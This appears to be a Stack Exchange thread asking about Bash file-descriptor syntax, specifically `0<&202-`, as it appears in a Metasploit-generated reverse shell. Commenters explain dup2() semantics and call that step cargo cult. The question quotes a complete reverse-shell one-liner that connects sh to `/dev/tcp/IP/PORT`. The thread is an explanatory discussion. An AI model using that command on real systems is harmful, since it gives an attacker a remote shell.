# How can 0<&202- be used in Bash to duplicate input file descriptor, when 202 is not a file descriptor?

Tags: bash, shell-script, io-redirection

I sometimes see Bash reverse shells as the following, where the pseudo file `/dev/tcp/IP/PORT` is used in conjunction with redirection (duplication of file descriptors):

```
0<&202-;exec 202<>/dev/tcp/IP/PORT;sh <&202 >&202 2>&202
```

However, why does the above command work (from Metasploit)? According to the documentation below (`man bash`), then `0<&202-` should fail, because `202-` is not a valid file descriptor open for input?

Bonus question: Can `/dev/tcp/IP/PORT` always be used as both an input file descriptor and as a output file descriptor?

> The redirection operator [n]<&word is used to duplicate input file
>   descriptors. If word expands to one or more digits, the file
>   descriptor denoted by n is made to be a copy of that file descriptor.
>   If the digits in word do not specify a file descriptor open for input,
>   a redirection error occurs. If word evaluates to -, file descriptor n
>   is closed. If n is not specified, the standard input (file descriptor
>   0) is used.

Comment: For `0<&202-`, check "Moving File Descriptors" in the `bash(1)` manpage. Of course, the fd `202` has to be open for that to work. For your bonus question, yes `<`, `>`, and `<>` work exactly the same with `/dev/tcp/host/port`. See also [this](https://unix.stackexchange.com/a/525663).

Comment: Thank you. Are these `/dev/tcp..` the only special files that Bash threat both as files and file descriptors? 
If `202` must exist and be open, why does the above command work (it does work)?

Comment: The `0<&202-;` does not "work". If the fd 202 is not open, it will complain. Either way, it should just juggle with dup'ing fds back and forth and have no lasting effects. Unless it's trying to leverage some bash bug, which I'm not able to figure out. Where did you get that code from?

Comment: The code is from Metasploit framework. Won't the other commands fail, if the file descriptor is not closed first in case it was already open?

Comment: No, the `0<&202-` has no effect whatsoever. And a simple `exec 77<foo` or `exec 78>&5-` will close whatever file the `77` or `78` fds referred to before. Look the `dup2()` syscall -- they're the 2nd argument to it.

Comment: If you gave an exact link, that would be great. Maybe they're exploiting some bug in `bash`? I've checked with the current and an older (4.4) version and couldn't figure out anything dubious about it.

Comment: I generated the code using `msfvenom -p cmd/unix/reverse_bash`, but the source code (Ruby) can be seen here: https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/unix/reverse_bash.rb. Are you sure that `exec 77<foo` is also utilizing `dup2()`? That is not duplicating file descriptors according to the Bash man page. Also, is the `-` in `exec 78>&5-` a typo?

Comment: Yes, I'm sure. `exec 77<foo` is ~equivalent to `int fd = open("foo", O_RDONLY); dup2(fd, 77); close(fd)`. (+ error checking). `fcntl(F_DUPFD)` or `dup3()` could be used instead of `dup2()` -- they're similar.

Comment: And no, the `-` in `78>&5-` is not a typo. `78>&5-` is different from `78>&5`: the 1st will also close the fd 5, the 2nd won't. As to the metasploit code, the `0<&202-;` looks like cargo cult, copy-pastisis. I challenge its authors to explain it ;-)